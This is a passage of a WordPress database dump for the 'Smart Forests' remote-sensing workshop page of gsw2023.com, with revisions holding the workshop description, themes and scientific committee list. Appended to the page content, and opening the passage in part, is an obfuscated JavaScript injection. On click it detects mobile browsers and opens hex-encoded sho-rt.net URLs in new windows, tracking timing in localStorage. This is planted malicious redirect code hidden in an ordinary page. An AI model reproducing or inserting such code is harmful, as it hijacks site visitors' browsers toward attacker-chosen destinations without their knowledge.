\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-19 17:08:30','2022-11-19 17:08:30','',3049,'https://gsw2023.com/?p=3323',0,'revision','',0),
(3324,1,'2022-11-19 17:09:54','2022-11-19 17:09:54','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3050\" img_size=\"450*300\"][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2></h2>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\n<li><strong>Automation and real-time system operations</strong></li>\n<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing technologies</strong></li>\n<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\n<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\n<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: </u></strong></h5>\n<ul>\n<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\n<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Francesco Pirotti, University of Padova, Italy</strong></li>\n<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\n<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\n<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\n<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\n<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\n<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\n<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\n<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-19 17:09:54','2022-11-19 17:09:54','',3049,'https://gsw2023.com/?p=3324',0,'revision','',0),
(3325,1,'2022-11-19 17:15:51','2022-11-19 17:15:51','','gsw2023_for','','inherit','open','closed','','gsw2023_for','','','2022-11-19 17:15:51','2022-11-19 17:15:51','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for.jpg',0,'attachment','image/jpeg',0),
(3326,1,'2022-11-19 17:16:52','2022-11-19 17:16:52','','gsw2023_for','','inherit','open','closed','','gsw2023_for-2','','','2022-11-19 17:16:52','2022-11-19 17:16:52','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for-1.jpg',0,'attachment','image/jpeg',0),
(3327,1,'2022-11-19 17:18:10','2022-11-19 17:18:10','','gsw2023_for','','inherit','open','closed','','gsw2023_for-3','','','2022-11-19 17:18:10','2022-11-19 17:18:10','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for-2.jpg',0,'attachment','image/jpeg',0),
(3328,1,'2022-11-19 17:18:16','2022-11-19 17:18:16','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3050\" img_size=\"450*300\"][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\r\n<h5><strong>This workshop is jointly organized by</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\r\n</li>\r\n</ul>\r\n[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h2></h2>\r\n<h2>CO-CHAIRS</h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the event:</u></strong></h5>\r\n<ul>\r\n 	<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\r\n 	<li><strong>Automation and real-time system operations</strong></li>\r\n 	<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing 